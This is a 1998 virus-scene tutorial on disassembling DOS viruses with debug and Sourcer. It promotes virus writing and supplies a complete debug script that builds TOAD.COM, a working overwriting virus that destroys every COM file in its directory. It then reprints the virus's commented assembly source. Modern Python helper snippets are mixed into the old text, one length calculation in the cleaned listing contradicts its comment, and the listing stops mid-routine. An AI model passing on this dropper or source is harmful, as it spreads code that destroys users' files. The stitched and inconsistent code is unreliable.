Reverse Engineering: The Viral Approach.
By HornyToad & Opic
A CodeBreakers Production,
(C) 1998 (
http://www.Codebreakers.org)


Technology is advancing at an alarming rate every day. In order to keep up with the mainstream, industry programmers have had to utilize software reverse engineering to stay abreast of important advances. In a world of a million buzz words, 'reverse engineering' has made a place for itself as a respectable activity. Chuckling, I wonder if a thief will eventually be called an acquisition technician. Reverse engineering is simply a method of prying into software to steal other programmers' techniques. We're not passing judgement on this practice; quite the contrary, we're very proud to be "engineers". In the field of virus writing and cracking, however, we tend to use the word disassembly more often than reverse engineering.

As the title indicates, the majority of this text will be devoted to sparking interest in disassembling virus code. Disassembly can also be very helpful to the cracker and, in general, to any professional programmer. The cracker might use the disassembled code to extract and change passwords and access privileges. The professional programmer will most likely be using reverse engineering to study others' techniques and advances in programming. The virus writer will most likely be following in the footsteps of the professional programmer. Who knows, that professional programmer might be a virus writer. Let's face it, if you want to learn how to program, do you want to rely on a boring underpaid teacher to inspire you? Or would you like to learn how to program by creating a virus or hacking program? Trust me, virus writing is fascinating and challenging.

The art of virus disassembly and examination has been a practice covered in a veil of ambiguity for quite a long time in the virus (and even more so in the anti-virus) community. And there is a logical reason for this when you consider it:

On the side of the VX community:

"If anyone knows how to disassemble and debug my virus, they can learn my techniques (which many virus writers don't want) as well as the fact that AV can more easily scan for and disinfect the virus after examination."

On the side of the AV:

"If people understand how viruses work, and can even write their own disinfection routines, or remove a virus infection manually then the mystical hysteria that a viral infection brings can no longer be used to my advantage to sell my anti-virus product" (cough-cough-mcafee-cough-cough).

So no matter which side of the fence you stand on, it should be clear that virus disassembly should be a major part of your viral studies. If you are a member of the AV community and find yourself in conflict with the fact that you are learning from or reading this tutorial, which comes from the side of the VX, take heart! The AV community will teach you the exact same thing that we are teaching you in this tutorial...**for a price** (as usual). 600 pounds is the last figure we saw for a cute little luncheon with a complimentary diskette with some virus from the 80's and some shareware AV program. So take your pick. We personally find the VX side to be more noble, working in the pursuit of knowledge, as the AV works in pursuit of the all-encompassing '$' sign.

The virus community has undergone many changes in the past 10 years. In the beginning, darkness covered the abyss... This beginning passage from the Bible describes the state of virus source code in the late 80's and early 90's. The push in the virus community was to release virus executables, rather than the revealing source code. Therefore, in order for the knowledge to spread throughout the underground, coders relied on disassemblies. Disassemblies were often very crude in those days and rarely worked. They did, however, shed light on the virus writer's strategy, which, for the most part, was enough to guide beginners in the right direction. Over the years, the focus of the virus community has changed. Currently, the most common practice is to publish source code along with the executable. In fact, many virus writers prefer to publish only the source code. The intellectual advances are becoming more important to the coders than the destructive actions of the executable. We prefer to see the coder's original source, rather than an executable. Even though we have test machines for watching how a virus works, viewing the original source is the most precise method of learning the virus writer's techniques.

Unfortunately, this change in strategy, releasing the source code, has led to the weakening of disassembly skills, primarily in the use of the debugger. A debug program is one that allows you to manipulate and view memory locations, registers, and individual program instructions. The DOS debug program is a powerful tool for prying open executables and recovering their source code. We must footnote that a thorough knowledge of assembly language is a necessity in order to fully exploit debug. This article assumes that you are familiar with the basic assembly instructions. Our primary goal in writing this article is to spawn interest in the reader to disassemble executables. Don't be afraid to uncover the secrets of the original programmer.

Debug

There are many fine disassemblers and debuggers out on the market. If you are willing to pay the big bucks, take a look at such programs as Sourcer, IDA, and SoftIce. Before you go out there and spend a lot of money on a big name program, take a look at the one that you already have, Debug. No, we're not crazy. Look in your \windows\command directory. We'll bet it's there. If not, do a search of your dos files; it's hiding somewhere on your drive. Go to a dos prompt and type debug. You should see the debug prompt "-" on the next line. Debug is loaded into memory and is ready to use. To quit out of debug, press "Q" then <enter>.

Let's first take a quick look at the debug commands:

*Hint* All numbers passed to debug are assumed to be hex. You do not need to add the "h" at the end of the number. We would recommend buying a calculator that handles hex conversion.
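If you don't have a hex calculator on your desk, any scripting language will do the conversions for you. Here is a minimal sketch in Python (our choice for illustration, nothing debug itself requires); the function names are made up for this example.

```python
# Convert between the hex values debug expects and ordinary decimal.

def hex_to_dec(text):
    """Parse a debug-style hex string; a trailing 'h' is tolerated."""
    return int(text.rstrip("hH"), 16)

def dec_to_hex(value):
    """Format a decimal number the way debug prints it: uppercase hex."""
    return format(value, "X")

print(hex_to_dec("B4"))   # a length that shows up later in this article
print(dec_to_hex(256))    # the offset where COM code starts
```

Running it prints 180 and 100, which you can check against the (H)exadecimal command once you are inside debug.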

*Hint* Please find a copy of the MS-DOS Users Guide. It is very helpful for learning some of the basics about DOS operations. It also contains a very informative guide to debug usage. All of the debug commands are explained with examples. A must for your library!

(A)ssemble - Allows you to input assembly statements, which debug translates into machine code. Type "A" and press <enter>. You will be returned an address in the form of segment:offset. The default offset for this command is 100.

(C)ompare - In order to compare two areas of memory, type "c <range> <address>", for example "-c 100 l20 300". The range defaults to the data segment. Only the bytes that differ are displayed, side by side with their addresses.

(D)isplay - Used simply to view a memory location. Again the default register is DS for this command, but you can specify any segment you want. For example, "-D CS:100 <enter>", displays 80 hex bytes (default) beginning at CS:100. The length can be specified other than the default by including "L<length>" in the command line, for example, "-D CS:100 L100".

(E)nter - Allows you to enter data or machine code into a specified location. Typing:

E cs:100 B4 4E 33 C9 BA 2F 01 CD 21 72 1B B8 02 3D BA 9E

will enter this line of code starting at address cs:100.

(F)ill - Useful for filling a memory location with a specified value. Type:

-f 100 500 'Codebreakers Rule!'

This will fill the memory locations from 100 to 500 with some important words to remember. Type 'd 100' to see them.

(G)o - Executes the program loaded into memory, optionally stopping at a specified breakpoint.

(H)exadecimal - This is your handy dandy hex calculator. Enter 'H <valueA> <valueB>', and debug will return the hex sum and difference of the two values. Very useful!
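To see what the H command is doing, here is a small Python sketch of the same arithmetic. It assumes both results wrap at 16 bits and print as four hex digits, the way debug shows them; the function name debug_h is ours.

```python
def debug_h(a, b):
    """Mimic debug's H command: return (sum, difference) as 4-digit hex,
    wrapping at 16 bits the way a 16-bit register would."""
    x, y = int(a, 16), int(b, 16)
    total = (x + y) & 0xFFFF
    diff = (x - y) & 0xFFFF
    return format(total, "04X"), format(diff, "04X")

# Same idea as typing "H 1B4 100" at the debug prompt.
print(*debug_h("1B4", "100"))
```

The difference of an end offset and a start offset is exactly how you get a program length, which is why this command earns its keep during a disassembly.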

(I)nput - displays a byte from a port address.

(L)oad - Very useful command! This command allows you to load a program or disk sectors into debug. To load a file, first give its name with "-N <filename>", then type "-L"; the file is loaded at CS:100. "-L <address> <drive> <startSector> <length>", for example "-L 100 0 10 20", loads 20 sectors from drive A (0), beginning at sector 10, to CS:100. Remember that these numbers are hex. The default segment for this command is CS.

(M)ove - Moves the contents of one location to another. Default is DS. Syntax: "-m ds:100 l50 ds:300". This will move 50 bytes from ds:100 to location ds:300.

(N)ame - Sets the filename that a following (L)oad or (W)rite will use.

(O)utput - Sends a byte to a port.

(P)roceed - Like (T)race, but executes a call, loop, or interrupt routine as a single step.

(Q)uit - Quits debug.

(R)egister - Displays the registers and the next instruction.

(S)earch - Searches a specified range through default DS for a "string" or data entity. Returns location if found.

(T)race - Executes the program in single step mode, displaying the registers after each instruction. A count of instructions to execute can be specified.

(U)nassemble - Produces assembly instructions for a specified range or simply 32 bytes when unspecified. Default is CS.

(W)rite - Writes BX:CX bytes, starting at CS:100, to the (N)amed file on disk. In essence, this is your save command.

We think that the best way to learn how to use debug is through a practical example. In general, people always learn faster when they have hands-on training. Well, that's what you are going to get. And guess what, you are going to perform your first virus disassembly! We have specifically chosen a small uncomplicated virus for this first example. Below, you will see a debug script to create an instructional virus from the CodeBreakers VX magazine. Study the commands. The first line (N)ames the file that will be written, TOAD.COM. As you can see, the next several lines (E)nter machine code from CS:0100 through CS:01B3. The line "RCX" and the subsequent line "00B4" load the program length into CX. When in doubt as to the length of the program, look at the offset at the beginning of the last line, in this case 01B0. Then count single bytes across to the final byte entered, "24", 4 bytes across. That puts the end of the program at 01B4, and subtracting the starting offset of 0100 leaves a length of 00B4. Easy. The next line (W)rites the program (TOAD.COM). The final line quits out of debug. We hope that you are already realizing the wealth of information that you can get from using the debug program. Save the information below in a file called "toad.txt". At a dos prompt, type: "debug < toad.txt <enter>". Debug will then read its commands from toad.txt and present you with a functional virus, toad.com. Do not worry about this virus spreading through your system, it won't. This is a very simple COM overwriting virus: when run, it overwrites every COM file in the current directory with its own code and goes no further. Keep it in an empty scratch directory on a test machine, follow our instructions, and nothing you care about will be touched.

 N TOAD.COM
 E 0100 B4 4E 33 C9 BA 2F 01 CD 21 72 1B B8 02 3D BA 9E
 E 0110 00 CD 21 93 B4 40 B9 B4 00 BA 00 01 CD 21 B4 3E
 E 0120 CD 21 B4 4F EB DC B4 09 BA 35 01 CD 21 CD 20 2A
 E 0130 2E 63 6F 6D 00 43 6F 6E 67 72 61 74 75 6C 61 74
 E 0140 69 6F 6E 73 21 20 59 6F 75 20 68 61 76 65 20 69
 E 0150 6E 66 65 63 74 65 64 20 61 6C 6C 20 74 68 65 20
 E 0160 43 4F 4D 20 66 69 6C 65 73 20 69 6E 20 74 68 69
 E 0170 73 20 0A 0D 64 69 72 65 63 74 6F 72 79 20 77 69
 E 0180 74 68 20 74 68 65 20 54 6F 61 64 20 69 6E 73 74
 E 0190 72 75 63 74 69 6F 6E 61 6C 20 76 69 72 75 73 2E
 E 01A0 20 48 61 76 65 20 61 20 6E 69 63 65 20 64 61 79
 E 01B0 2E 0A 0D 24
 RCX
 00B4
 W
 Q
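The length arithmetic described before the script (offset of the last E line, plus the bytes on it, minus the load offset of 100) is easy to get wrong by hand. Here is a hedged Python sketch that does the same count; script_length is a name we made up, and it only understands the simple "E offset byte byte ..." form used in the script above.

```python
def script_length(e_lines, load_offset=0x100):
    """Return the byte count RCX should hold for 'E addr byte...' lines."""
    end = load_offset
    for line in e_lines:
        parts = line.split()
        if not parts or parts[0].upper() != "E":
            continue                      # skip N, RCX, W, Q and blank lines
        start = int(parts[1], 16)         # offset at the front of the line
        end = max(end, start + len(parts) - 2)
    return end - load_offset

# Only the final line matters for the length, so that is all we feed in.
last_line = "E 01B0 2E 0A 0D 24"
print(format(script_length([last_line]), "04X"))
```

It prints 00B4, the same value the script hands to RCX.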

In a way, I cheated by giving you the machine code to the virus ahead of time. Normally, the task of the disassembler (coder) would be to produce source from only the executable. Anyway, now that you have the working virus executable, let's get to work. Load toad.com into a debug session by typing:

A:\debug toad.com         <-    type
-                         <-    debug prompt (ready for action)

Remember that executable code begins after the <P>rogram <S>egment <P>refix at CS:100. What we therefore need to do is view the <R>egisters and find out the length of toad.com. Typing "r" at the debug prompt allows you to see the values of the registers. The important one that we are looking for first is the initial value of CX. When debug loads a file, BX:CX holds its length; for a file this small BX is zero, so CX alone is the length. In this case B4 hex (or 180 decimal) bytes. Take a moment to study the different registers. Notice that the "r" command also printed the assembly code for the first instruction. 278E:0100 is the segment:offset address for CS:100, or the beginning of the program (the segment value will differ on your machine). Notice also that the IP is set to 100. "B44E" disassembles to the assembly instruction "MOV AH,4E".

 -r
 AX=0000  BX=0000  CX=00B4  DX=0000  SP=FFFE  BP=0000  SI=0000  DI=0000
 DS=278E  ES=278E  SS=278E  CS=278E  IP=0100   NV UP EI PL NZ NA PO NC
 278E:0100 B44E          MOV     AH,4E
 -
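If you capture debug's output to a file, the register dump is regular enough to pick apart with a script. The following Python sketch is only an illustration: parse_registers is our own name, and the pattern assumes the two-letter NAME=XXXX layout shown above.

```python
import re

def parse_registers(dump):
    """Turn the output of debug's R command into {register: int}."""
    pairs = re.findall(r"\b([A-Z]{2})=([0-9A-F]{4})\b", dump)
    return {name: int(value, 16) for name, value in pairs}

dump = """AX=0000  BX=0000  CX=00B4  DX=0000  SP=FFFE  BP=0000  SI=0000  DI=0000
DS=278E  ES=278E  SS=278E  CS=278E  IP=0100   NV UP EI PL NZ NA PO NC"""

regs = parse_registers(dump)
length = (regs["BX"] << 16) | regs["CX"]   # file length lives in BX:CX
print(length)
print(format(regs["CS"], "04X") + ":" + format(regs["IP"], "04X"))
```

The flag mnemonics at the end of the second line carry no "=" sign, so the pattern skips them.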

Now that we have the length of the program, we can <D>isplay, or dump the program's machine code to the screen. This is accomplished by <D>isplaying from CS:100 for a <l>ength of b4. Observe below that the data portion of the virus follows directly after the executable portion. This is the first clue that we have as to the offset for the data structure. From the beginning of the data portion of the code, any assembly instructions that debug "translates" for you will be bogus. Type:

 -d cs:100 lb4

278E:0100  B4 4E 33 C9 BA 2F 01 CD-21 72 1B B8 02 3D BA 9E   .N3../..!r...=..
278E:0110  00 CD 21 93 B4 40 B9 B4-00 BA 00 01 CD 21 B4 3E   ..!..@.......!.>
278E:0120  CD 21 B4 4F EB DC B4 09-BA 35 01 CD 21 CD 20 2A   .!.O.....5..!. *
278E:0130  2E 63 6F 6D 00 43 6F 6E-67 72 61 74 75 6C 61 74   .com.Congratulat
278E:0140  69 6F 6E 73 21 20 59 6F-75 20 68 61 76 65 20 69   ions! You have i
278E:0150  6E 66 65 63 74 65 64 20-61 6C 6C 20 74 68 65 20   nfected all the
278E:0160  43 4F 4D 20 66 69 6C 65-73 20 69 6E 20 74 68 69   COM files in thi
278E:0170  73 20 0A 0D 64 69 72 65-63 74 6F 72 79 20 77 69   s ..directory wi
278E:0180  74 68 20 74 68 65 20 54-6F 61 64 20 69 6E 73 74   th the Toad inst
278E:0190  72 75 63 74 69 6F 6E 61-6C 20 76 69 72 75 73 2E   ructional virus.
278E:01A0  20 48 61 76 65 20 61 20-6E 69 63 65 20 64 61 79   Have a nice day
278E:01B0  2E 0A 0D 24                                       ...$
-

In both the above listing and below, it is easy to determine the end of the program instructions. In this case, find the CD 20 (int 20) instruction which terminates the virus. Directly after the CD 20 at location CS:012D, the first sign of a data portion appears, hex 2A, the * character.

                          
 -u cs:100 l2f
 278E:0100 B44E          MOV     AH,4E
 278E:0102 33C9          XOR     CX,CX
 278E:0104 BA2F01        MOV     DX,012F
 278E:0107 CD21          INT     21
 278E:0109 721B          JB      0126
 278E:010B B8023D        MOV     AX,3D02
 278E:010E BA9E00        MOV     DX,009E
 278E:0111 CD21          INT     21
 278E:0113 93            XCHG    BX,AX
 278E:0114 B440          MOV     AH,40
 278E:0116 B9B400        MOV     CX,00B4
 278E:0119 BA0001        MOV     DX,0100
 278E:011C CD21          INT     21
 278E:011E B43E          MOV     AH,3E
 278E:0120 CD21          INT     21
 278E:0122 B44F          MOV     AH,4F
 278E:0124 EBDC          JMP     0102
 278E:0126 B409          MOV     AH,09
 278E:0128 BA3501        MOV     DX,0135
 278E:012B CD21          INT     21
 278E:012D CD20          INT     20
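Debug has already worked out the jump targets in the listing above, but it pays to know how, since you will want to double-check them when a disassembler gets confused. A short jump is two bytes: the opcode and a signed displacement counted from the address of the next instruction. A minimal Python sketch of that rule (the function name is ours):

```python
def short_jump_target(address, displacement):
    """Target of a 2-byte short jump located at `address`.
    The displacement byte is signed and counted from the next instruction."""
    if displacement >= 0x80:
        displacement -= 0x100            # 80h..FFh are negative offsets
    return (address + 2 + displacement) & 0xFFFF

print(format(short_jump_target(0x0109, 0x1B), "04X"))  # bytes 72 1B at 0109
print(format(short_jump_target(0x0124, 0xDC), "04X"))  # bytes EB DC at 0124
```

The two results, 0126 and 0102, match the JB and JMP operands that debug printed.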

It is important that you are aware of what bogus assembly instructions look like. This is where an understanding of basic assembly is required. Take a look below at the code above the dashed line. It is easy to decipher what the actual instructions are. You might even recognize what the virus is doing from this little snip of code. Then, after the int 20, all hell breaks loose. What the hell is this "sub ch,[6f63]"? What an eyesore! When code begins to look like this, you are going to be forced to draw a conclusion: 1. The code segment has ended. 2. The data segment might be starting. 3. We may be dealing with code polymorphism or encryption. There are other possibilities, but for the sake of the beginner, at a minimum, recognize that a change has occurred.

                             
 278E:0122 B44F          MOV     AH,4F
 278E:0124 EBDC          JMP     0102
 278E:0126 B409          MOV     AH,09
 278E:0128 BA3501        MOV     DX,0135
 278E:012B CD21          INT     21
 278E:012D CD20          INT     20
 -------------------------------------------------------------
 278E:012F 2A2E636F      SUB     CH,[6F63]
 278E:0133 6D            DB      6D
 278E:0134 00436F        ADD     [BP+DI+6F],AL
 278E:0137 6E            DB      6E
 278E:0138 67            DB      67
 278E:0139 7261          JB      019C
 278E:013B 7475          JZ      01B2
 278E:013D 6C            DB      6C
 278E:013E 61            DB      61
 278E:013F 7469          JZ      01AA
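One quick way to back up the hunch that "the data segment might be starting" is to look for runs of printable ASCII in the raw bytes. The Python sketch below is a rough heuristic of our own, not a feature of debug, and the short byte fragment is copied from the dump around CS:012B.

```python
def ascii_runs(data, base=0x100, min_len=4):
    """Return (offset, text) for each run of printable ASCII
    that is at least min_len bytes long."""
    runs, start = [], None
    for i, byte in enumerate(data + b"\x00"):   # sentinel flushes the last run
        if 0x20 <= byte <= 0x7E:
            if start is None:
                start = i
        else:
            if start is not None and i - start >= min_len:
                runs.append((base + start, data[start:i].decode("ascii")))
            start = None
    return runs

fragment = bytes.fromhex("CD 21 CD 20 2A 2E 63 6F 6D 00 43 6F 6E 67 72 61 74")
for offset, text in ascii_runs(fragment, base=0x012B):
    print(format(offset, "04X"), repr(text))
```

Notice that the first run is reported at 012E rather than 012F: the 20 operand of INT 20 happens to be a printable space, so the heuristic swallows it. That is why a run of text is a hint about where data begins, and the last real instruction is still the proof.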

Once you are comfortable with moving around a program within debug, it is now time to formulate an intelligent looking disassembly. We'd like to classify disassembly into two different forms, the utility disassembly and the work of art. The utility disassembly is when someone simply copies the debug output into a file and gives it an asm extension. This code can look quite ugly and may not even work. The work of art is when someone includes assembler specific instructions to the asm file, gives meaningful symbolic names, translates data, and comments the code. For example:

1. Assembler specific instructions:

If you are using TASM, for example, and the virus is of COM file type, include such directives as:

 code    segment
	 assume  cs:code,ds:code
	 org     100h
	  :
	  :
 code    ends
	 end     start

You might even want to include TASM compile instructions like:

     ;TASM nameOfVirus.ASM
     ;TLINK /t nameOfVirus.OBJ

Including the above instructions/structures in the code will aid people who might not be TASM literate in assembling the virus.

2. Meaningful symbolic names:

During disassembly, whether through debug or an expensive disassembler, symbolic names of procedures, labels, and variables are lost. Debug translates them as actual memory addresses. Disassemblers often assign them meaningless names like "loc_1". Take a look at the examples below. Which one of them would be easier for a beginner to understand? They both accomplish the same end result, although the code on top is more self-explanatory.

 find_first:
	 mov     ah,4eh
	 xor     cx,cx
	 lea     dx,comFile
	 int     21h
	 jc      outMessage
 or

 loc_1:
     mov ah,4Eh
     xor cx,cx
     mov dx,12Fh
     int 21h
     jc loc_2
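Renaming by hand gets tedious on anything longer than a few lines, so you may want to script the first pass. Here is a hedged Python sketch that swaps known addresses in debug's U output for names; the label names and the LABELS table are our own picks for this example, and the function only looks at the operand field.

```python
import re

# Hypothetical label names chosen by the person doing the disassembly.
LABELS = {0x0102: "find_file", 0x0126: "no_more_files",
          0x012F: "filespec", 0x0135: "message"}

def name_operand(line, labels=LABELS):
    """Replace a 4-digit hex operand in one line of U output with its label."""
    def swap(match):
        return labels.get(int(match.group(0), 16), match.group(0))
    # Only touch the operand field, i.e. the text after the last space.
    head, sep, operand = line.rpartition(" ")
    return head + sep + re.sub(r"\b[0-9A-F]{4}\b", swap, operand)

print(name_operand("278E:0109 721B          JB      0126"))
print(name_operand("278E:0104 BA2F01        MOV     DX,012F"))
```

The output is meant for reading, not for feeding straight to an assembler. Whether a number is really an address or just a value that happens to look like one is still your call.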

3. Translate data:

Once more, which one looks better? Enough said. It might be tedious breaking out the ASCII code chart and translating the data section, but when someone looks at your disassembly, they will appreciate it.

 db '*.com', 0
 db 'Congratulations! You have infect'

 or

 db  2Ah, 2Eh, 63h, 6Fh, 6Dh, 00h, 43h, 6Fh, 6Eh, 67h, 72h, 61h
 db  74h, 75h, 6Ch, 61h, 74h, 69h, 6Fh, 6Eh, 73h, 21h, 20h, 59h
 db  6Fh, 75h, 20h, 68h, 61h, 76h, 65h, 20h, 69h, 6Eh, 66h, 65h
 db  63h, 74h
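If breaking out the ASCII chart sounds too tedious, the translation from the second form to the first can be scripted. A minimal Python sketch, assuming the bytes are written as "NNh" tokens like the listing above (db_line is a made-up name):

```python
def db_line(tokens):
    """Turn 'NNh' byte tokens into a db directive, quoting printable runs."""
    parts, text = [], ""
    for token in tokens.replace(",", " ").split():
        byte = int(token.rstrip("hH"), 16)
        if 0x20 <= byte <= 0x7E and chr(byte) != "'":
            text += chr(byte)             # keep collecting a quoted string
            continue
        if text:
            parts.append("'" + text + "'")
            text = ""
        parts.append(str(byte))           # non-printable bytes stay numeric
    if text:
        parts.append("'" + text + "'")
    return "db " + ", ".join(parts)

print(db_line("2Ah, 2Eh, 63h, 6Fh, 6Dh, 00h"))
```

This prints db '*.com', 0. Non-printable bytes come out in decimal, so 0Ah and 0Dh would appear as 10 and 13.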

4. Comment your code:

We have had many programming teachers say that you can never put too many comments into your code. We have heard an equal number say that there only need to be a few concise comments. It's a never ending battle. We would tend to recommend too many comments rather than not enough. Many beginners are given the advice that, in order to learn assembly, you have to study source code. That's fine and dandy, but when you're not necessarily comfortable with assembly, looking at naked code can give you a headache. Try to provide enough comments so that the beginner can understand how each line fits into the program's operation. For example:

 
 mov ah,3Eh           ;function 3Eh-close file
 int 21h              ;go dos!

 mov ah,4Fh           ;function 4Fh-find next file
 jmp find_file        ;jump to find next file to infect

Essentially, that's all there is to it. Extract the assembly instructions and data through the use of debug into an asm file. Tidy the code up, add comments and turn the file into a work of art by following the few pointers that we stated above. We realize that this is very short and sweet, but in order to include everything about debugging operations, we would need to write a book. There are many more techniques which need to be implemented to counteract anti-debugging techniques. Thankfully, many of the more powerful disassemblers on the market today can defeat the majority of anti-debugging techniques. After trying hard to sell you on debug, we have to admit that we more often use Turbo Debugger by Borland for viewing code. Essentially, both programs accomplish the same thing. But Turbo Debugger's delivery is very sweet. As you trace through your code, in separate windows you can view the flags and registers changing dynamically. There is a window in the lower right-hand corner of the screen that allows you to view the stack as values are pushed onto and popped off of it. Breakpoints are easy to set, so that you can execute your program up to a certain point, checking the registers and flags to see the results. All in all, Turbo Debugger is a fascinating program and learning tool. We highly recommend it.

Now, let's take a quick look at the same virus executable, but this time we'll put it under a slightly different microscope: a disassembler. What do we need to get started? We are going to start out with the most simple and effective setup we can. So first things first: go collect the tools that you don't have from the list below. Tools we need:

1)A good disassembler (duh) or two. Many people will argue that this disassembler is better than that one and this one sucks because that one...blah, blah, blah. You're boring us! The fact is that a disassembler program is a tool: just a tool. You use it WITH your intellect and can make it as valuable or as worthless as you wish. There are a lot of disassemblers out there, but this is the one we are going to be working with, because first of all it is relatively easy to use, and second it is fairly accurate and widely available:

Sourcer 7.0 (or higher) if you can acquire it. Our other suggestion is probably an even better disassembler: IDA. But it is much more difficult to acquire and is VERY large in size. Feel free to try the demo version, but you will not be able to save your disassemblies (very cheap on their part), so we chose not to use examples from it in this tutorial. However, we would suggest that you cross reference (double-check) your disassemblies from Sourcer with IDA's as well as through a debugger. This will help you in recreating a more precise disassembly.

2)The Ralf Brown Int list-this is IMPERATIVE in disassembly!

You can acquire these at:

http://www.cs.cmu.edu/afs/cs.cmu.edu/user/ralf/pub/WWW/files.html

or:

http://www.simtel.net/pub/simtelnet/msdos/info/

(the file intwin**.zip -currently intwin57.zip...still updating)

3)TOAD.COM -overwriting virus which can be found in debug script in the debugging portion of this tutorial or from Codebreakers VX Zine #1 available at:

http://www.codebreakers.org.

Alright, now we are going to start from the ground up. What is a disassembly? Simply put, it is drawing the source code of an executable program from the program itself. This is EXTREMELY useful in learning programming tricks and examining code that you do not understand and do not have the source code to. It is even more useful to the virus writer, who can acquire through the WWW or his/her contacts a copy of just about any virus in executable form, but for whom coming across the source code can be impossible.

Now let us interject some of the problems we see today with most virus disassemblies and what it truly means to do a disassembly. Most viral disassemblies that you will download off the net are very, very sloppy code which in almost any instance won't even compile (and often, if it does, will function NOTHING like the original virus did). This is usually due to one simple factor: the executable was run through a disassembler without being examined, corrected, altered, etc. In other words, the person doing the disassembly just ran it through the program and zipped it up. This is an almost useless and definitely fruitless practice which we would like to see an end to. What does it mean to do a "real" disassembly? Well, the most accurate disassemblies are done through debug with notepad open, recording step by step what the virus does. BUT, many of us do not have the time to do such disassemblies, and we will argue that a disassembly done through one of today's disassembler programs, combined with some foot work on the part of the reverse engineer and mixed with a bit of debugging (to clarify the gray areas of the disassembly), can do AS good if not a BETTER job than the 100% debug route.

The three most important aspects of doing a disassembly of a program are:

  1. Know how to set the options on your disassembler to create the most accurate disassembly possible.
  2. Have another disassembler and a debugger to cross reference with (i.e. a lot of disassemblers make errors, and it is good to use more than one to get a more accurate "picture" of the program you are disassembling).
  3. Do NOT just leave the disassembly as it lies when it comes out of the disassembler. The ASM file that comes from the disassembler is the RAW material from which we will sculpt a working, functioning likeness of the original virus. We will need to clean it up, get rid of junk inserted by the disassembler, get rid of locational numbers, and give labels more descriptive names. And while we are doing that we will intuitively begin to get a better sense of the virus we are disassembling. You should have the Ralf Brown files open during your entire "cleaning process" to refer to.

Constantly double check strange int's and sub-functions, make the code "human" again. We find the easiest way to illustrate this process is to show you it step by step. We will show you examples from Sourcer 7.0, what settings and options we have chosen, and how they look in their RAW form straight from the disassemblers.

1)Disassembly of TOAD.COM using Sourcer 7.0 Settings:

Input file:TOAD.COM

Target assembler: TASM 5.0 (We know that TASM was what was used to originally assemble this virus, so we will choose the most current version of TASM, as a newer version almost always supports code from older versions but not vice versa. It is worthwhile to investigate what assembler the author of the virus you are disassembling preferred, as it will aid you in your entire disassembly.)

Also choose: (functional match).

Output filename: TOAD.ASM

File format: press F so that .asm is displayed as the output format, so we can do away with those annoying segment addresses and whatnot that Sourcer will otherwise insert.

Remarks: all. Why not? Let's see what Sourcer can help us with.

Label type: We choose decimal. They are all annoying, but this one is easiest for us; this is pretty much just preference here.

OK, that's a pretty decent setup for Sourcer, let's see what it came up with:

 ---------------------------------------------------------------------------

PAGE  59,132

;UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
;UU                                                                      UU
;UU                             TOAD                                     UU
;UU                                                                      UU
;UU      Created:   19-Oct-97                                            UU
;UU      Passes:    5          Analysis Options on: none                 UU
;UU                                                                      UU
;UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU

target          EQU   'T5'                      ; Target assembler: TASM-5.0

include  srmacros.inc


; The following equates show data references outside the range of the program.

data_1e         equ     9Eh

seg_a           segment byte public
		assume  cs:seg_a, ds:seg_a


		org     100h

toad            proc    far

start:
		mov     ah,4Eh                  ; 'N'
loc_1:
		xor     cx,cx                   ; Zero register
		mov     dx,12Fh
		int     21h                     ; DOS Services  ah=function 4Fh
						;  find next filename match
		jc      loc_2                   ; Jump if carry Set
		mov     ax,3D02h
		mov     dx,data_1e
		int     21h                     ; DOS Services  ah=function 3Dh
						;  open file, al=mode,name@ds:dx
		xchg    bx,ax
		mov     ah,40h                  ; '@'
		mov     cx,0B4h
		mov     dx,100h
		int     21h                     ; DOS Services  ah=function 40h
						;  write file  bx=file handle
						;   cx=bytes from ds:dx buffer
		mov     ah,3Eh
		int     21h                     ; DOS Services  ah=function 3Eh
						;  close file, bx=file handle
		mov     ah,4Fh                  ; 'O'
		jmp     short loc_1
loc_2:
		mov     ah,9
		mov     dx,offset data_4        ; ('Congratulations! You hav')
		int     21h                     ; DOS Services  ah=function 09h
						;  display char string at ds:dx
		int     20h                     ; DOS program terminate
		db      '*.com', 0
data_4          db      'Congratulations! You have infect'
		db      'ed all the COM files in this ', 0Ah
		db      0Dh, 'directory with the Toad ins'
		db      'tructional virus. Have a nice da'
		db      'y.', 0Ah, 0Dh, '$'

toad            endp

seg_a           ends



		end     start
----------------------------------------------------------------------------

O.K., not bad, not bad at all really. If we like, we can attempt to recompile this code and see if it compiles and runs properly. It looks fairly legible, so what we can do is run it through IDA to see if we get any differences in code construction or content. While we may not see much here because this is a simple overwriting virus, we can assure you that you will see it in more complex code (we will talk about some common disassembler flaws and errors later on). Go ahead and run Toad.com through the demo version of IDA (if you have it) and you'll see very little variation in code. Which means we can move on to the next step of cleaning and commenting the code. Here is the code after we have sifted through it, removing the junk Sourcer includes, renaming locations and data labels, and clearing up odd bits of code.

----------------------------------------------------------------------------
;**************************************************************************
;                  TOAD Overwriting Virus 
;
;           Disassembly By Opic [CodeBreakers '98]
;
;                Recompilable with TASM/TLINK
;
;NOTES: TOAD is a simple .COM overwriting virus. I have little to say about
;this virus as it is very uninteresting by nature, and has little value
;other then as an instructive device.
;**************************************************************************

virus           segment byte public
		assume  cs:virus, ds:virus
		org     100h
toad            proc    near                    ;was far, disassembler 
						;incosistancy


start:                                          ;start of virus code
		mov     ah,4Eh                  ;function 4eh-find first file
find_file:
		xor     cx,cx                   ;clears CX register
		mov     dx,filespec             ;12Fh points to  *.com so
						;well just rename it with
						;a label to make life easier

		int     21h                     ;go DOS!
		jc      no_more_files           ;If there are no more files
						;to infect (i.e. if carry 
						;flag is set) then jump here

		mov     ax,3D02h                ;open file for read/write acess
		mov     dx,9eh                  ;get file info
						;ok heres a small difference
						;in the disassembly...in which
						;sourcer had mov dx,data_1e
						;data_1e being: 9eh
						;so lets just cut out the 
						;middle man (as the author
						;probably did......
		int     21h                     ;Go dos!
						; 
		xchg    bx,ax                   ;puts file handle in bx from ax  
		mov     ah,40h                  ;function 40h-write to file 
	
		mov     cx,offset end_virus - offset find_file

						;this is the length we want to
						;write to the file we are
						;infecting...it is the same as
						;mov cx,0B4h which is the length
						;of our virus from 100h (start
						;of .com file)
		lea dx, start                   ;essentially the same command
						;again; we are just making it
						;more 'human' for the reader.
						;this tells DOS to start
						;writing from the 'start' label
						;which is conveniently located
						;at 100h, thus same as:
						;mov dx,100h

		int     21h                     ;go dos!
		mov     ah,3Eh                  ;function 3Eh-close file
		int     21h                     ;go dos! 
						  
